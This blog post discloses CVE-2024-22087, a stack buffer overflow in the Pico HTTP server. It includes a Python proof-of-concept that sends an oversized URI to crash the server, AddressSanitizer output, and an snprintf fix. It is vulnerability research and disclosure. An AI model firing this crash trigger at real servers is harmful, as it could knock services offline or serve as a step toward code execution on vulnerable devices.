Zero-Day Research: CVE-2024-22087 Pico HTTP Server in C Remote Buffer Overflow

Introduction

Buffer overflows are a common and potentially devastating vulnerability in computer systems and applications. In this blog post, we will delve into the world of buffer overflows, explore the concept of remote buffer overflows, identify the common causes of buffer overflows specifically in HTTP servers, and walk through a remote buffer overflow vulnerability that I discovered in the Pico HTTP server (CVE-2024-22087). Understanding these topics is crucial for both developers and security professionals to protect systems and applications from potential threats.

Buffer Overflows: An Overview

A buffer overflow occurs when data overflows from a fixed-size buffer into adjacent memory locations. This can result in unexpected behavior, crashes, or even security vulnerabilities that malicious actors can exploit. The primary cause of buffer overflows is the improper handling of input data by a program, typically due to insufficient bounds checking.

Understanding Remote Buffer Overflows

Remote buffer overflows are a subset of buffer overflows that occur when an attacker exploits a vulnerability in a program to execute malicious code from a remote location. This type of attack can be particularly dangerous because it allows attackers to compromise a system without direct physical or local access. Here’s how a remote buffer overflow attack typically unfolds:

Vulnerability Identification: Attackers search for vulnerabilities in a target application or service, such as an HTTP server, that could potentially be exploited.
Payload Crafting: Once a vulnerability is identified, attackers create a payload designed to exploit the specific weakness in the target system. This payload is typically crafted to overwrite a buffer with malicious code or data.
Remote Execution: The attacker sends the payload to the target system over a network, triggering the buffer overflow when the vulnerable program processes the input. This allows the attacker to gain control over the system or execute arbitrary code.
Exploitation: With control over the system, the attacker can carry out a variety of malicious activities, such as stealing data, launching further attacks, or compromising the integrity of the system.

Common Causes of Buffer Overflows in HTTP Servers

HTTP servers are essential components of web applications, making them attractive targets for attackers. Here are some common causes of buffer overflows in HTTP servers:

Input Validation Flaws: HTTP servers often receive data from client requests, such as HTTP headers or parameters. Inadequate input validation and sanitization can lead to buffer overflows when handling this data.
Improper Memory Management: HTTP server software may have vulnerabilities related to memory allocation and deallocation. Errors in handling memory can create opportunities for buffer overflows.
Outdated Software: Running outdated or unpatched HTTP server software can expose systems to known vulnerabilities that attackers can exploit using buffer overflows.
Configuration Errors: Misconfigurations in server settings can introduce vulnerabilities. For example, allowing unrestricted file uploads without proper validation can lead to buffer overflow vulnerabilities.

Buffer Overflow Example

Let’s review an example of a buffer overflow in C++ to better understand this vulnerability class.

#include <iostream>
#include <cstring>

int main() {
    char buffer[10];
    std::string secret = "MySecret";

    // Copy a user-provided string into the buffer without bounds checking
    std::cout << "Enter a string: ";
    std::cin >> buffer;

    // Display the secret
    std::cout << "Secret: " << secret << std::endl;

    return 0;
}

In this example, we have a C++ program that declares a character array buffer with a size of 10. It also initializes a std::string called secret with the value “MySecret.”

The vulnerable part of the code is the std::cin >> buffer; line. This line reads a user-provided string into the buffer without performing any bounds checking. If the user enters a string longer than 10 characters, it will overflow the buffer, potentially overwriting adjacent memory.

For instance, if the user enters a string like ‘12345678901234567890,’ it will overflow the buffer, and any data located in memory immediately after the buffer (e.g., the secret variable) may be partially overwritten. The buffer array has a size of 10 characters, and it cannot hold more than that without overwriting adjacent memory. In this case, the input ‘12345678901234567890’ would overflow the buffer, potentially affecting data in memory beyond the buffer’s bounds.

CVE-2024-22087: Uncovering a Remote Stack Buffer Overflow Vulnerability

In my recent exploration of cybersecurity vulnerabilities, I stumbled upon an alarming discovery—a remote stack buffer overflow vulnerability within the Pico HTTP server. This security flaw is present up to commit f3b69a6 and resides in the function void route() within main.c, specifically on line 81:

GET(uri) {
  char file_name[255];
  sprintf(file_name, "%s%s", PUBLIC_DIR, uri);

This revelation holds grave implications: any project utilizing Pico is susceptible to remote code execution. The risk for code execution is far greater on IoT devices and embedded systems where common memory protections are not present.

Preparing for Investigation: Makefile Modifications

Before diving into the specifics, I implemented some modifications to the Makefile. These changes facilitate the compilation of Pico with address sanitizer and debug symbols, enabling me to track and validate the stack buffer overflow vulnerability:

all: server

clean:
    @rm -rf *.o
    @rm -rf server

server: main.o httpd.o
    gcc -o server $^ -fsanitize=address -g

main.o: main.c httpd.h
    gcc -c -o main.o main.c -fsanitize=address -g

httpd.o: httpd.c httpd.h
    gcc -c -o httpd.o httpd.c -fsanitize=address -g

Compiling Pico with Address Sanitizer

To compile Pico with the address sanitizer and debug symbols, execute the following command:

$ make

Crafting a Proof of Concept Python3 Script

A Python3 script, named poc.py, serves as a proof of concept for this vulnerability. It sends an HTTP request with a malformed URI (2,000,000 bytes in length) to Pico and awaits a response:

#!/usr/bin/env python3

import socket

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("localhost", 8000))
sock.send(b"GET /" + b"C" * 2000000 + b"HTTP/1.1\r\nHost: localhost:8000\r\n\r\n")
response = sock.recv(4096)
sock.close()

Running Pico

To start the Pico server, execute the following command:

./server

Executing the Python3 Script

Execute the Python3 script to simulate the buffer overflow attack:

$ python3 poc.py

Address Sanitizer Output

Upon running the Python3 script, address sanitizer provides valuable insights into the nature of the vulnerability:

==960119==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7f214c10015f at pc 0x7f214e09215c bp 0x7ffe88c08220 sp 0x7ffe88c079e0
WRITE of size 65487 at 0x7f214c10015f thread T0
    #0 0x7f214e09215b in __interceptor_vsprintf ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:1765
    #1 0x7f214e09233e in __interceptor_sprintf ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:1808
    #2 0x556476f2cd71 in route /home/kali/projects/fuzzing/pico/main.c:81
    ...

This error occurs due to writing data that surpasses the allocated buffer size. In this case, the file_name buffer defined in the route function with a size of 255 bytes is overflowing. The overflow occurs within the sprintf call when concatenating PUBLIC_DIR with URI or other strings to form a file path. If the combined length of these strings exceeds 255 characters, it overflows the file_name buffer.

Mitigating the Vulnerability

To promptly mitigate this vulnerability, replace sprintf with snprintf. The latter allows you to specify the maximum number of characters to be written, including the null terminator. This prevents stack buffer overflow by truncating the string if it exceeds the specified length.

Original code with a buffer overflow vulnerability:

sprintf(file_name, "%s%s", PUBLIC_DIR, uri);

Modified code preventing a buffer overflow:

snprintf(file_name, sizeof(file_name), "%s%s", PUBLIC_DIR, uri);

Conclusion

In the ever-evolving landscape of cybersecurity threats, understanding and addressing vulnerabilities are paramount. The discovery of CVE-2024-22087 highlights the critical importance of code hygiene and proactive measures to fortify your systems against potential exploits. By implementing mitigation strategies like the one provided, we can collectively strengthen our digital defenses.